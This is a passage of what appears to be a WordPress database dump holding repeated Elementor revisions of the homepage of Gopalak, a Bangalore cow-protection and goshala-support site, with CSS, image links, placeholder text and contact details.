https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 18:15:23','2022-10-10 12:45:23','',1373,'https://gopalak.in/?p=1598',0,'revision','',0),(1599,1,'2022-10-10 18:15:23','2022-10-10 12:45:23','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 18:15:23','2022-10-10 12:45:23','',1373,'https://gopalak.in/?p=1599',0,'revision','',0),(1600,1,'2022-10-10 18:15:23','2022-10-10 12:45:23','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 18:15:23','2022-10-10 12:45:23','',1373,'https://gopalak.in/?p=1600',0,'revision','',0),(1602,1,'2022-10-11 10:31:15','2022-10-11 05:01:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:31:15','2022-10-11 05:01:15','',1373,'https://gopalak.in/?p=1602',0,'revision','',0),(1603,1,'2022-10-11 10:31:15','2022-10-11 05:01:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 